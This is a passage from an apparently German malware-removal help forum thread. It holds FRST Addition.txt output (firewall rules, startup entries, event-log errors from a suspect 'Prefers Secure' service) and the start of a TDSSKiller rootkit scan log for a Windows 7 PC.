 104.131.26.227 ok-bar.love.mail.ru														

Da befinden sich 59 zusätzliche Einträge.


==================== Andere Bereiche ============================

(Aktuell gibt es keinen automatisierten Fix für diesen Bereich.)

HKU\S-1-5-21-2822580911-2257060262-2848143123-1000\Control Panel\Desktop\\Wallpaper -> C:\Users\Dominik\AppData\Roaming\Microsoft\Windows\Themes\TranscodedWallpaper.jpg
DNS Servers: 192.168.2.1
HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System => (ConsentPromptBehaviorAdmin: 5) (ConsentPromptBehaviorUser: 3) (EnableLUA: 1)
Windows Firewall ist aktiviert.

==================== MSCONFIG/TASK MANAGER Deaktivierte Einträge ==

MSCONFIG\startupreg: BlueStacks Agent => C:\Program Files (x86)\Bluestacks\HD-Agent.exe
MSCONFIG\startupreg: PlaysTV => "C:\Program Files (x86)\Raptr Inc\PlaysTV\playstv_launcher.exe" --startup
MSCONFIG\startupreg: Raptr => "C:\Program Files (x86)\Raptr Inc\Raptr\raptrstub.exe" --startup
MSCONFIG\startupreg: Skype => "C:\Program Files (x86)\Skype\Phone\Skype.exe" /minimized /regrun
MSCONFIG\startupreg: StartCCC => "C:\Program Files (x86)\AMD\ATI.ACE\Core-Static\amd64\CLIStart.exe" MSRun
MSCONFIG\startupreg: StartCN => "C:\Program Files\AMD\CNext\CNext\RadeonSettings.exe" atlogon

==================== Firewall Regeln (Nicht auf der Ausnahmeliste) ===============

(Wenn ein Eintrag in die Fixlist aufgenommen wird, wird er aus der Registry entfernt. Die Datei wird nicht verschoben solange sie nicht separat aufgelistet wird.)

FirewallRules: [SPPSVC-In-TCP] => (Allow) %SystemRoot%\system32\sppsvc.exe
FirewallRules: [SPPSVC-In-TCP-NoScope] => (Allow) %SystemRoot%\system32\sppsvc.exe
FirewallRules: [{DD8C4F30-520D-4B8C-9CAF-9F4BA34EA9CF}] => (Allow) C:\Program Files (x86)\Raptr Inc\PlaysTV\playstv.exe
FirewallRules: [{6C3B2350-47A3-4E43-9F5D-C5204C1D9EAF}] => (Allow) C:\Program Files (x86)\Raptr Inc\PlaysTV\playstv.exe
FirewallRules: [{EB25413A-5E52-46B4-BA0C-6CDFDBB7139E}] => (Allow) F:\Program Files\Steam.exe
FirewallRules: [{161C16FA-E49B-44BA-BD57-DC1DD3AB06AC}] => (Allow) F:\Program Files\Steam.exe
FirewallRules: [{60C14198-9A22-49F3-BBDC-93F7FAB6B231}] => (Allow) F:\Program Files\bin\steamwebhelper.exe
FirewallRules: [{CB638DAB-CF80-4146-AC6A-8F4E9CFE6492}] => (Allow) F:\Program Files\bin\steamwebhelper.exe
FirewallRules: [{EAF5F20D-A729-4577-91F8-FE120E401616}] => (Allow) F:\Program Files\SteamApp\Steam.exe
FirewallRules: [{300564AC-836D-4FD9-BB9C-3066C709272E}] => (Allow) F:\Program Files\SteamApp\Steam.exe
FirewallRules: [{9640BDD3-6935-402B-ADCE-79E9D1E34F2B}] => (Allow) F:\Program Files\SteamApp\bin\steamwebhelper.exe
FirewallRules: [{2CBD5C04-05B3-441F-A02D-569C4638D200}] => (Allow) F:\Program Files\SteamApp\bin\steamwebhelper.exe
FirewallRules: [{E9CD2098-5B59-4BD2-B314-7D1694879B8C}] => (Allow) F:\Program Files\Microsoft Visual Studio 14.0\Common7\IDE\devenv.exe
FirewallRules: [TCP Query User{1159E399-DDA3-4612-9DF6-0EB0F631A150}F:\release\release\pogo.necrobot.cli.exe] => (Allow) F:\release\release\pogo.necrobot.cli.exe
FirewallRules: [UDP Query User{4B15EC3A-770A-4AB3-8C53-B3FA326249C1}F:\release\release\pogo.necrobot.cli.exe] => (Allow) F:\release\release\pogo.necrobot.cli.exe
FirewallRules: [TCP Query User{566EAE7F-CA4A-4EDD-AE5E-87CD3C4C1573}F:\pogolocationfeeder-release-v0.0.2.1\pogolocationfeeder.exe] => (Allow) F:\pogolocationfeeder-release-v0.0.2.1\pogolocationfeeder.exe
FirewallRules: [UDP Query User{E3ED22CE-2162-46C7-9F44-E46894F432DF}F:\pogolocationfeeder-release-v0.0.2.1\pogolocationfeeder.exe] => (Allow) F:\pogolocationfeeder-release-v0.0.2.1\pogolocationfeeder.exe
FirewallRules: [TCP Query User{E2F033F5-E806-4E74-9BCF-BEFC52DC7BA3}F:\release (1)\release\pokemobbot.exe] => (Allow) F:\release (1)\release\pokemobbot.exe
FirewallRules: [UDP Query User{E423A029-641A-4579-A6DF-873BBE679B55}F:\release (1)\release\pokemobbot.exe] => (Allow) F:\release (1)\release\pokemobbot.exe
FirewallRules: [TCP Query User{C5652239-4B11-4827-9A87-CC7C5F8C92F9}F:\desktop\release\pokemobbot.exe] => (Allow) F:\desktop\release\pokemobbot.exe
FirewallRules: [UDP Query User{249814FC-CC2C-4022-B0DC-910985F89354}F:\desktop\release\pokemobbot.exe] => (Allow) F:\desktop\release\pokemobbot.exe
FirewallRules: [TCP Query User{C798173C-CF44-4AFB-856F-37839F57EAD4}F:\release (2)\necrobot.exe] => (Allow) F:\release (2)\necrobot.exe
FirewallRules: [UDP Query User{CC35C4D5-9145-4E12-BD35-DB0FBFE1B66C}F:\release (2)\necrobot.exe] => (Allow) F:\release (2)\necrobot.exe
FirewallRules: [TCP Query User{29E8515B-F4CA-4162-81C9-542E4018DD0B}F:\release (2) - kopie\necrobot.exe] => (Allow) F:\release (2) - kopie\necrobot.exe
FirewallRules: [UDP Query User{E3D9E661-7560-48BF-8452-0513872E97E4}F:\release (2) - kopie\necrobot.exe] => (Allow) F:\release (2) - kopie\necrobot.exe
FirewallRules: [{076E2EB8-7285-4A52-AF48-11595DD1FC84}] => (Allow) C:\Program Files (x86)\Raptr Inc\Raptr\raptr.exe
FirewallRules: [{B8973EAF-2F7B-44D8-9452-C0B29FA8FBB8}] => (Allow) C:\Program Files (x86)\Raptr Inc\Raptr\raptr.exe
FirewallRules: [{04577EAE-6FDC-477E-BD19-B63B7CE20B3C}] => (Allow) C:\Program Files (x86)\Raptr Inc\Raptr\raptr_im.exe
FirewallRules: [{B76C9CF4-4B1E-4AC8-998E-431781DE35C4}] => (Allow) C:\Program Files (x86)\Raptr Inc\Raptr\raptr_im.exe
FirewallRules: [{4E5C32A1-88E0-415B-9947-BC9A4292DBAC}] => (Allow) C:\Users\Dominik\AppData\Roaming\Nox\bin\Nox.exe
FirewallRules: [{03558CBE-8EAE-45A6-BDC3-7D92708EF634}] => (Allow) C:\Program Files\Bignox\BigNoxVM\RTNoxVMHandle.exe
FirewallRules: [TCP Query User{D884656D-DBBB-4875-BFDE-1AA90F5F627B}F:\gba emu\vbalink180b0\visualboyadvance.exe] => (Allow) F:\gba emu\vbalink180b0\visualboyadvance.exe
FirewallRules: [UDP Query User{C44BAD95-538D-4C11-A1D0-877AB2E4E0FC}F:\gba emu\vbalink180b0\visualboyadvance.exe] => (Allow) F:\gba emu\vbalink180b0\visualboyadvance.exe
FirewallRules: [TCP Query User{2DC4347F-F085-4010-A128-0D3948AD55F8}F:\gba emu\vbalink180b0 - kopie\visualboyadvance.exe] => (Allow) F:\gba emu\vbalink180b0 - kopie\visualboyadvance.exe
FirewallRules: [UDP Query User{D8563C77-DBBE-4529-8B54-EAC13B9A94AB}F:\gba emu\vbalink180b0 - kopie\visualboyadvance.exe] => (Allow) F:\gba emu\vbalink180b0 - kopie\visualboyadvance.exe
FirewallRules: [{57CBCD6E-01EE-4030-BBDC-B215FF81639B}] => (Allow) F:\Program Files\SteamApp\bin\cef\cef.win7\steamwebhelper.exe
FirewallRules: [{2273E97C-579D-4FA8-86BA-38520D980DBC}] => (Allow) F:\Program Files\SteamApp\bin\cef\cef.win7\steamwebhelper.exe
FirewallRules: [{23C21ED4-D170-4379-B62D-760546632E2C}] => (Allow) F:\Program Files\SteamApp\steamapps\common\Counter-Strike Global Offensive\csgo.exe
FirewallRules: [{6E388D24-8CDE-49F5-BAC5-34409A3F4198}] => (Allow) F:\Program Files\SteamApp\steamapps\common\Counter-Strike Global Offensive\csgo.exe
FirewallRules: [{557300BC-6769-4539-9A2C-C36F297B39D8}] => (Allow) F:\Program Files\SteamApp\steamapps\common\Borderlands 2\Binaries\Win32\Launcher.exe
FirewallRules: [{ECC69094-7A17-4EB6-AB29-A3CB2826E7B5}] => (Allow) F:\Program Files\SteamApp\steamapps\common\Borderlands 2\Binaries\Win32\Launcher.exe
FirewallRules: [{155E3520-5F62-405B-9BEC-EC94A30CA861}] => (Allow) C:\Program Files (x86)\Skype\Phone\Skype.exe
FirewallRules: [{70951E33-A35F-4270-84B8-9433AADA84DF}] => (Allow) F:\Program Files\SteamApp\steamapps\common\Borderlands 2\Binaries\Win32\Borderlands2.exe
FirewallRules: [{B47E0FDE-2CD3-4025-A123-53B7C4532A49}] => (Allow) F:\Program Files\SteamApp\steamapps\common\Borderlands 2\Binaries\Win32\Borderlands2.exe
FirewallRules: [{8EAF2738-3D40-4DDA-BA81-5FE173ECA58C}] => (Allow) F:\Program Files\SteamApp\steamapps\common\The Evil Within Demo\EvilWithinDemo.exe
FirewallRules: [{8BF82326-DD38-410C-A255-8C107DC95FC8}] => (Allow) F:\Program Files\SteamApp\steamapps\common\The Evil Within Demo\EvilWithinDemo.exe
FirewallRules: [{4430739E-B1BA-448D-8840-29A87D535CED}] => (Allow) F:\Program Files\SteamApp\steamapps\common\Fallout 4\Fallout4Launcher.exe
FirewallRules: [{1884BDB9-BADE-41B5-8E17-BBAEEF86E648}] => (Allow) F:\Program Files\SteamApp\steamapps\common\Fallout 4\Fallout4Launcher.exe
FirewallRules: [{9040095F-4106-4C7C-9C70-EA95141B08A5}] => (Allow) C:\Program Files (x86)\Microsoft Office\root\Office16\outlook.exe
FirewallRules: [{D74E4216-5C25-4F49-BD9A-44907923C886}] => (Allow) C:\Users\Dominik\AppData\Local\TNT2\2.0.0.2101\TNT2User.exe
FirewallRules: [{7449A525-AB53-4D3C-A586-D0DE65023050}] => (Allow) C:\Program Files (x86)\PremierOpinion\pmropn.exe
FirewallRules: [{511E9E47-0709-4895-949F-A5EE5D5D0F47}] => (Allow) C:\Program Files (x86)\PremierOpinion\pmropn.exe
FirewallRules: [{EC0132A4-8243-45DA-B433-1ABBCA249702}] => (Allow) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe

==================== Wiederherstellungspunkte =========================

06-03-2017 20:21:08 Wiederherstellungsvorgang
09-03-2017 20:40:06 UnHackMe Malware Removal
09-03-2017 21:07:58 Wiederherstellungsvorgang
11-03-2017 15:20:34 Installed Etron USB3.0 Host Controller

==================== Fehlerhafte Geräte im Gerätemanager =============

Name: Teredo Tunneling Pseudo-Interface
Description: Microsoft-Teredo-Tunneling-Adapter
Class Guid: {4d36e972-e325-11ce-bfc1-08002be10318}
Manufacturer: Microsoft
Service: tunnel
Problem: : This device cannot start. (Code10)
Resolution: Device failed to start. Click "Update Driver" to update the drivers for this device.
On the "General Properties" tab of the device, click "Troubleshoot" to start the troubleshooting wizard.


==================== Fehlereinträge in der Ereignisanzeige: =========================

Applikationsfehler:
==================
Error: (03/11/2017 03:20:06 PM) (Source: MsiInstaller) (EventID: 1013) (User: Dominik-PC)
Description: Product: Etron USB3.0 Host Controller -- This installation cannot be run by directly launching the MSI package. You must run setup.exe.

Error: (03/11/2017 03:15:40 PM) (Source: WinMgmt) (EventID: 10) (User: )
Description: Ereignisfilter mit Abfrage "SELECT * FROM __InstanceModificationEvent WITHIN 60 WHERE TargetInstance ISA "Win32_Processor" AND TargetInstance.LoadPercentage > 99" konnte im Namespace "//./root/CIMV2" nicht reaktiviert werden aufgrund des Fehlers 0x80041003. Ereignisse können nicht durch diesen Filter geschickt werden, bis dieses Problem gelöst ist.

Error: (03/11/2017 03:14:17 PM) (Source: Application Error) (EventID: 1000) (User: )
Description: Name der fehlerhaften Anwendung: Nettrans.exe, Version: 1.0.0.0, Zeitstempel: 0x58b841f5
Name des fehlerhaften Moduls: KERNELBASE.dll, Version: 6.1.7601.23572, Zeitstempel: 0x57fd0379
Ausnahmecode: 0xe0434352
Fehleroffset: 0x0000c54f
ID des fehlerhaften Prozesses: 0xab0
Startzeit der fehlerhaften Anwendung: 0x01d29a71bc310342
Pfad der fehlerhaften Anwendung: C:\ProgramData\PrefersSecure\Nettrans.exe
Pfad des fehlerhaften Moduls: C:\Windows\syswow64\KERNELBASE.dll
Berichtskennung: 02df0a39-0665-11e7-9cf3-94de80bfdb2f

Error: (03/11/2017 03:14:02 PM) (Source: .NET Runtime) (EventID: 1026) (User: )
Description: Anwendung: Nettrans.exe
Frameworkversion: v4.0.30319
Beschreibung: Der Prozess wurde aufgrund einer unbehandelten Ausnahme beendet.
Ausnahmeinformationen: System.ArgumentNullException
   bei System.String.Join(System.String, System.String[])
   bei Application_Hosting.Service1..ctor(System.String[])
   bei Application_Hosting.Program.Main(System.String[])

Error: (03/11/2017 03:12:43 PM) (Source: ATIeRecord) (EventID: 16387) (User: )
Description: ATI EEU Service event error

Error: (03/11/2017 02:42:23 PM) (Source: MsiInstaller) (EventID: 11922) (User: Dominik-PC)
Description: Product: FMW 1 -- Error 1922. Service 'AVG Service' (avgsvc) could not be deleted.  Verify that you have sufficient privileges to remove system services.

Error: (03/11/2017 01:54:55 PM) (Source: MsiInstaller) (EventID: 11723) (User: NT-AUTORITÄT)
Description: Product: Update_msi -- Error 1723. There is a problem with this Windows Installer package. A DLL required for this install to complete could not be run. Contact your support personnel or package vendor.  Action _406F2359_86D5_429B_A359_03A481E00443, entry: load, library: C:\Windows\Installer\MSIEC2.tmp

Error: (03/11/2017 01:29:37 PM) (Source: Application Hang) (EventID: 1002) (User: )
Description: Programm chrome.exe, Version 56.0.2924.87 kann nicht mehr unter Windows ausgeführt werden und wurde beendet. Überprüfen Sie den Problemverlauf in der Wartungscenter-Systemsteuerung, um nach weiteren Informationen zum Problem zu suchen.

Prozess-ID: 1218

Startzeit: 01d29a623b2a292a

Endzeit: 60000

Anwendungspfad: C:\Program Files (x86)\Google\Chrome\Application\chrome.exe

Berichts-ID: 3703babb-0656-11e7-b19f-94de80bfdb2f

Error: (03/11/2017 01:24:03 PM) (Source: WinMgmt) (EventID: 10) (User: )
Description: Ereignisfilter mit Abfrage "SELECT * FROM __InstanceModificationEvent WITHIN 60 WHERE TargetInstance ISA "Win32_Processor" AND TargetInstance.LoadPercentage > 99" konnte im Namespace "//./root/CIMV2" nicht reaktiviert werden aufgrund des Fehlers 0x80041003. Ereignisse können nicht durch diesen Filter geschickt werden, bis dieses Problem gelöst ist.

Error: (03/11/2017 01:22:40 PM) (Source: Application Error) (EventID: 1000) (User: )
Description: Name der fehlerhaften Anwendung: Nettrans.exe, Version: 1.0.0.0, Zeitstempel: 0x58b841f5
Name des fehlerhaften Moduls: KERNELBASE.dll, Version: 6.1.7601.23572, Zeitstempel: 0x57fd0379
Ausnahmecode: 0xe0434352
Fehleroffset: 0x0000c54f
ID des fehlerhaften Prozesses: 0xbb8
Startzeit der fehlerhaften Anwendung: 0x01d29a62248c3be4
Pfad der fehlerhaften Anwendung: C:\ProgramData\PrefersSecure\Nettrans.exe
Pfad des fehlerhaften Moduls: C:\Windows\syswow64\KERNELBASE.dll
Berichtskennung: 6b39d57c-0655-11e7-b19f-94de80bfdb2f


Systemfehler:
=============
Error: (03/11/2017 03:15:40 PM) (Source: Service Control Manager) (EventID: 7022) (User: )
Description: Der Dienst "Prefs Secure" wurde nicht richtig gestartet.

Error: (03/11/2017 03:15:00 PM) (Source: Service Control Manager) (EventID: 7023) (User: )
Description: Der Dienst "Superfetch" wurde mit folgendem Fehler beendet: 
Das System kann die angegebene Datei nicht finden.

Error: (03/11/2017 03:14:19 PM) (Source: Service Control Manager) (EventID: 7000) (User: )
Description: Der Dienst "Prefers Secure" wurde aufgrund folgenden Fehlers nicht gestartet: 
Der Dienst antwortete nicht rechtzeitig auf die Start- oder Steuerungsanforderung.

Error: (03/11/2017 03:14:19 PM) (Source: Service Control Manager) (EventID: 7009) (User: )
Description: Das Zeitlimit (60000 ms) wurde beim Verbindungsversuch mit dem Dienst Prefers Secure erreicht.

Error: (03/11/2017 03:14:02 PM) (Source: Service Control Manager) (EventID: 7000) (User: )
Description: Der Dienst "Plays.tv Update Service" wurde aufgrund folgenden Fehlers nicht gestartet: 
Der Dienst antwortete nicht rechtzeitig auf die Start- oder Steuerungsanforderung.

Error: (03/11/2017 03:14:02 PM) (Source: Service Control Manager) (EventID: 7009) (User: )
Description: Das Zeitlimit (60000 ms) wurde beim Verbindungsversuch mit dem Dienst Plays.tv Update Service erreicht.

Error: (03/11/2017 03:14:01 PM) (Source: Service Control Manager) (EventID: 7000) (User: )
Description: Der Dienst "Background Logic Handler" wurde aufgrund folgenden Fehlers nicht gestartet: 
Das System kann die angegebene Datei nicht finden.

Error: (03/11/2017 03:14:01 PM) (Source: Service Control Manager) (EventID: 7000) (User: )
Description: Der Dienst "AVG Service" wurde aufgrund folgenden Fehlers nicht gestartet: 
Der Dienst antwortete nicht rechtzeitig auf die Start- oder Steuerungsanforderung.

Error: (03/11/2017 03:14:01 PM) (Source: Service Control Manager) (EventID: 7009) (User: )
Description: Das Zeitlimit (60000 ms) wurde beim Verbindungsversuch mit dem Dienst AVG Service erreicht.

Error: (03/11/2017 03:13:10 PM) (Source: DCOM) (EventID: 10010) (User: )
Description: Der Server "{752073A1-23F2-4396-85F0-8FDB879ED0ED}" konnte innerhalb des angegebenen Zeitabschnitts mit DCOM nicht registriert werden.


CodeIntegrity:
===================================
  Date: 2016-06-26 22:35:53.476
  Description: Windows konnte die Abbildintegrität der Datei "\Device\HarddiskVolume3\Windows\System32\drivers\atikmpag.sys" nicht überprüfen, weil der Dateihash nicht im System gefunden wurde. Möglicherweise wurde durch eine kürzlich durchgeführte Hardware- oder Softwareänderung eine falsch signierte oder beschädigte Datei oder eine Datei, bei der es sich um schädliche Software aus einer unbekannten Quelle handelt, installiert.

  Date: 2016-06-26 22:35:53.476
  Description: Windows konnte die Abbildintegrität der Datei "\Device\HarddiskVolume3\Windows\System32\drivers\atikmpag.sys" nicht überprüfen, weil der Dateihash nicht im System gefunden wurde. Möglicherweise wurde durch eine kürzlich durchgeführte Hardware- oder Softwareänderung eine falsch signierte oder beschädigte Datei oder eine Datei, bei der es sich um schädliche Software aus einer unbekannten Quelle handelt, installiert.

  Date: 2016-06-26 22:24:32.616
  Description: Windows konnte die Abbildintegrität der Datei "\Device\HarddiskVolume3\Windows\System32\drivers\atikmpag.sys" nicht überprüfen, weil der Dateihash nicht im System gefunden wurde. Möglicherweise wurde durch eine kürzlich durchgeführte Hardware- oder Softwareänderung eine falsch signierte oder beschädigte Datei oder eine Datei, bei der es sich um schädliche Software aus einer unbekannten Quelle handelt, installiert.

  Date: 2016-06-26 22:24:32.616
  Description: Windows konnte die Abbildintegrität der Datei "\Device\HarddiskVolume3\Windows\System32\drivers\atikmpag.sys" nicht überprüfen, weil der Dateihash nicht im System gefunden wurde. Möglicherweise wurde durch eine kürzlich durchgeführte Hardware- oder Softwareänderung eine falsch signierte oder beschädigte Datei oder eine Datei, bei der es sich um schädliche Software aus einer unbekannten Quelle handelt, installiert.


==================== Speicherinformationen =========================== 

Prozessor: AMD FX(tm)-8350 Eight-Core Processor 
Prozentuale Nutzung des RAM: 26%
Installierter physikalischer RAM: 8152.73 MB
Verfügbarer physikalischer RAM: 6006.2 MB
Summe virtueller Speicher: 16303.64 MB
Verfügbarer virtueller Speicher: 13769.86 MB

==================== Laufwerke ================================

Drive c: () (Fixed) (Total:111.69 GB) (Free:52.29 GB) NTFS
Drive e: () (Removable) (Total:28.97 GB) (Free:27.85 GB) FAT32
Drive f: (Volume) (Fixed) (Total:931.51 GB) (Free:866.09 GB) NTFS

==================== MBR & Partitionstabelle ==================

========================================================
Disk: 0 (MBR Code: Windows 7 or 8) (Size: 111.8 GB) (Disk ID: D3222AFA)
Partition 1: (Active) - (Size=100 MB) - (Type=07 NTFS)
Partition 2: (Not Active) - (Size=111.7 GB) - (Type=07 NTFS)

========================================================
Disk: 1 (MBR Code: Windows 7 or 8) (Size: 931.5 GB) (Disk ID: BF74FA11)
Partition 1: (Not Active) - (Size=931.5 GB) - (Type=07 NTFS)

========================================================
Disk: 2 (Size: 29 GB) (Disk ID: 00000000)

Partition: GPT.

==================== Ende von Addition.txt ============================

AresInvicta · 11.03.2017, 16:47

TDSSKiller:

Code:

ATTFilter

16:43:23.0591 0x11f4  TDSS rootkit removing tool 3.1.0.12 Nov  7 2016 07:10:01
16:43:26.0289 0x11f4  ============================================================
16:43:26.0289 0x11f4  Current date / time: 2017/03/11 16:43:26.0289
16:43:26.0289 0x11f4  SystemInfo:
16:43:26.0289 0x11f4  
16:43:26.0289 0x11f4  OS Version: 6.1.7601 ServicePack: 1.0
16:43:26.0289 0x11f4  Product type: Workstation
16:43:26.0289 0x11f4  ComputerName: DOMINIK-PC
16:43:26.0289 0x11f4  UserName: Dominik
16:43:26.0289 0x11f4  Windows directory: C:\Windows
16:43:26.0289 0x11f4  System windows directory: C:\Windows
16:43:26.0289 0x11f4  Running under WOW64
16:43:26.0289 0x11f4  Processor architecture: Intel x64
16:43:26.0289 0x11f4  Number of processors: 8
16:43:26.0289 0x11f4  Page size: 0x1000
16:43:26.0289 0x11f4  Boot type: Normal boot
16:43:26.0289 0x11f4  CodeIntegrityOptions = 0x00000001
16:43:26.0289 0x11f4  ============================================================
16:43:26.0586 0x11f4  KLMD registered as C:\Windows\system32\drivers\14014169.sys
16:43:26.0586 0x11f4  KLMD ARK init status: drvProperties = 0xFFF00, osBuild = 7601.23572, osProperties = 0x1
16:43:26.0664 0x11f4  System UUID: {7E59C51F-8F95-75C7-D949-4AC820F7D5C6}
16:43:26.0929 0x11f4  Drive \Device\Harddisk1\DR1 - Size: 0xE8E0DB6000 ( 931.51 Gb ), SectorSize: 0x200, Cylinders: 0x1DB01, SectorsPerTrack: 0x3F, TracksPerCylinder: 0xFF, Type 'K0', Flags 0x00000040
16:43:26.0929 0x11f4  Drive \Device\Harddisk0\DR0 - Size: 0x1BF2976000 ( 111.79 Gb ), SectorSize: 0x200, Cylinders: 0x3901, SectorsPerTrack: 0x3F, TracksPerCylinder: 0xFF, Type 'K0', Flags 0x00000040
16:43:26.0945 0x11f4  Drive \Device\Harddisk2\DR2 - Size: 0x73EC00000 ( 28.98 Gb ), SectorSize: 0x200, Cylinders: 0xEC7, SectorsPerTrack: 0x3F, TracksPerCylinder: 0xFF, Type 'W'
16:43:26.0945 0x11f4  ============================================================
16:43:26.0945 0x11f4  \Device\Harddisk1\DR1:
16:43:26.0945 0x11f4  MBR partitions:
16:43:26.0945 0x11f4  \Device\Harddisk1\DR1\Partition1: MBR, Type 0x7, StartLBA 0x800, BlocksNum 0x74705800
16:43:26.0945 0x11f4  \Device\Harddisk0\DR0:
16:43:26.0945 0x11f4  MBR partitions:
16:43:26.0945 0x11f4  \Device\Harddisk0\DR0\Partition1: MBR, Type 0x7, StartLBA 0x800, BlocksNum 0x32000
16:43:26.0945 0x11f4  \Device\Harddisk0\DR0\Partition2: MBR, Type 0x7, StartLBA 0x32800, BlocksNum 0xDF61800
16:43:26.0945 0x11f4  \Device\Harddisk2\DR2:
16:43:26.0945 0x11f4  MBR partitions:
16:43:26.0945 0x11f4  \Device\Harddisk2\DR2\Partition1: MBR, Type 0xC, StartLBA 0x2000, BlocksNum 0x39F4000
16:43:26.0945 0x11f4  ============================================================
16:43:26.0945 0x11f4  C: <-> \Device\Harddisk0\DR0\Partition2
16:43:26.0960 0x11f4  F: <-> \Device\Harddisk1\DR1\Partition1
16:43:26.0960 0x11f4  ============================================================
16:43:26.0960 0x11f4  Initialize success
16:43:26.0960 0x11f4  ============================================================
16:43:34.0230 0x0dd0  ============================================================
16:43:34.0230 0x0dd0  Scan started
16:43:34.0230 0x0dd0  Mode: Manual; 
16:43:34.0230 0x0dd0  ============================================================
16:43:34.0230 0x0dd0  KSN ping started
16:43:34.0604 0x0dd0  KSN ping finished: true
16:43:34.0901 0x0dd0  ================ Scan system memory ========================
16:43:34.0901 0x0dd0  System memory - ok
16:43:34.0901 0x0dd0  ================ Scan services =============================
16:43:34.0947 0x0dd0  [ A87D604AEA360176311474C87A63BB88, B1507868C382CD5D2DBC0D62114FCFBF7A780904A2E3CA7C7C1DD0844ADA9A8F ] 1394ohci        C:\Windows\system32\DRIVERS\1394ohci.sys
16:43:34.0947 0x0dd0  1394ohci - ok
16:43:34.0979 0x0dd0  [ D81D9E70B8A6DD14D42D7B4EFA65D5F2, FDAAB7E23012B4D31537C5BDEF245BB0A12FA060A072C250E21C68E18B22E002 ] ACPI            C:\Windows\system32\drivers\ACPI.sys
16:43:34.0979 0x0dd0  ACPI - ok
16:43:34.0979 0x0dd0  [ 99F8E788246D495CE3794D7E7821D2CA, F91615463270AD2601F882CAED43B88E7EDA115B9FD03FC56320E48119F15F76 ] AcpiPmi         C:\Windows\system32\drivers\acpipmi.sys
16:43:34.0979 0x0dd0  AcpiPmi - ok
16:43:34.0994 0x0dd0  [ 2F6B34B83843F0C5118B63AC634F5BF4, 43E3F5FBFB5D33981AC503DEE476868EC029815D459E7C36C4ABC2D2F75B5735 ] adp94xx         C:\Windows\system32\drivers\adp94xx.sys
16:43:34.0994 0x0dd0  adp94xx - ok
16:43:35.0010 0x0dd0  [ 597F78224EE9224EA1A13D6350CED962, DA7FD99BE5E3B7B98605BF5C13BF3F1A286C0DE1240617570B46FE4605E59BDC ] adpahci         C:\Windows\system32\drivers\adpahci.sys
16:43:35.0010 0x0dd0  adpahci - ok
16:43:35.0025 0x0dd0  [ E109549C90F62FB570B9540C4B148E54, E804563735153EA00A00641814244BC8A347B578E7D63A16F43FB17566EE5559 ] adpu320         C:\Windows\system32\drivers\adpu320.sys
16:43:35.0025 0x0dd0  adpu320 - ok
16:43:35.0025 0x0dd0  [ 262D7C87D0AC20B96EF9877D3CA478A0, 54F7E5A5F8991C5525500C1ECCF3D3135D13F48866C366E52DF1D052DB2EE15B ] AeLookupSvc     C:\Windows\System32\aelupsvc.dll
16:43:35.0025 0x0dd0  AeLookupSvc - ok
16:43:35.0041 0x0dd0  [ 9A4A1EEE802BF2F878EE8EAB407B21B7, 177EB7DF4B35FE4C0E45E775A0FD5D48D39B410052E3EE18BDEEC809E152D9D8 ] AFD             C:\Windows\system32\drivers\afd.sys
16:43:35.0057 0x0dd0  AFD - ok
16:43:35.0057 0x0dd0  [ 608C14DBA7299D8CB6ED035A68A15799, 45360F89640BF1127C82A32393BD76205E4FA067889C40C491602F370C09282A ] agp440          C:\Windows\system32\drivers\agp440.sys
16:43:35.0057 0x0dd0  agp440 - ok
16:43:35.0057 0x0dd0  [ 3290D6946B5E30E70414990574883DDB, 0E9294E1991572256B3CDA6B031DB9F39CA601385515EE59F1F601725B889663 ] ALG             C:\Windows\System32\alg.exe
16:43:35.0057 0x0dd0  ALG - ok
16:43:35.0072 0x0dd0  [ 5812713A477A3AD7363C7438CA2EE038, A7316299470D2E57A11499C752A711BF4A71EB11C9CBA731ED0945FF6A966721 ] aliide          C:\Windows\system32\drivers\aliide.sys
16:43:35.0072 0x0dd0  aliide - ok
16:43:35.0072 0x0dd0  [ 102E0A294D4A2C4BB53210F4AD246A4D, B9816220CACBBD0FEB10E09FC3F46E6C376DDB6823ADACE848A9A0B2F238E6D5 ] AMD External Events Utility C:\Windows\system32\atiesrxx.exe
16:43:35.0072 0x0dd0  AMD External Events Utility - ok
16:43:35.0088 0x0dd0  [ C121E0C9690C0755ECC472D954961194, 5FE63250D7DB3076639BCE965C8DE08AD1B74828BB5E73E812472E5298544724 ] AMD FUEL Service C:\Program Files\AMD\ATI.ACE\Fuel\Fuel.Service.exe
16:43:35.0103 0x0dd0  AMD FUEL Service - ok
16:43:35.0103 0x0dd0  [ 1FF8B4431C353CE385C875F194924C0C, 3EA3A7F426B0FFC2461EDF4FDB4B58ACC9D0730EDA5B728D1EA1346EA0A02720 ] amdide          C:\Windows\system32\drivers\amdide.sys
16:43:35.0103 0x0dd0  amdide - ok
16:43:35.0103 0x0dd0  [ 7024F087CFF1833A806193EF9D22CDA9, E7F27E488C38338388103D3B7EEDD61D05E14FB140992AEE6F492FFC821BF529 ] AmdK8           C:\Windows\system32\drivers\amdk8.sys
16:43:35.0103 0x0dd0  AmdK8 - ok
16:43:35.0103 0x0dd0  amdkmdag - ok
16:43:35.0119 0x0dd0  [ B283403E7717FB0D41AD962C643FB7AC, D565C26ACF487B31961515330645100CD0BC77EA1C305E2012F1068146B232A5 ] amdkmdap        C:\Windows\system32\DRIVERS\atikmpag.sys
16:43:35.0135 0x0dd0  amdkmdap - ok
16:43:35.0135 0x0dd0  [ 1E56388B3FE0D031C44144EB8C4D6217, E88CA76FD47BA0EB427D59CB9BE040DE133D89D4E62D03A8D622624531D27487 ] AmdPPM          C:\Windows\system32\DRIVERS\amdppm.sys
16:43:35.0135 0x0dd0  AmdPPM - ok
16:43:35.0150 0x0dd0  [ D4121AE6D0C0E7E13AA221AA57EF2D49, 626F43C099BD197BE56648C367B711143C2BCCE96496BBDEF19F391D52FA01D0 ] amdsata         C:\Windows\system32\drivers\amdsata.sys
16:43:35.0150 0x0dd0  amdsata - ok
16:43:35.0150 0x0dd0  [ F67F933E79241ED32FF46A4F29B5120B, D6EF539058F159CC4DD14CA9B1FD924998FEAC9D325C823C7A2DD21FEF1DC1A8 ] amdsbs          C:\Windows\system32\drivers\amdsbs.sys
16:43:35.0150 0x0dd0  amdsbs - ok
16:43:35.0166 0x0dd0  [ 540DAF1CEA6094886D72126FD7C33048, 296578572A93F5B74E1AD443E000B79DC99D1CBD25082E02704800F886A3065F ] amdxata         C:\Windows\system32\drivers\amdxata.sys
16:43:35.0166 0x0dd0  amdxata - ok
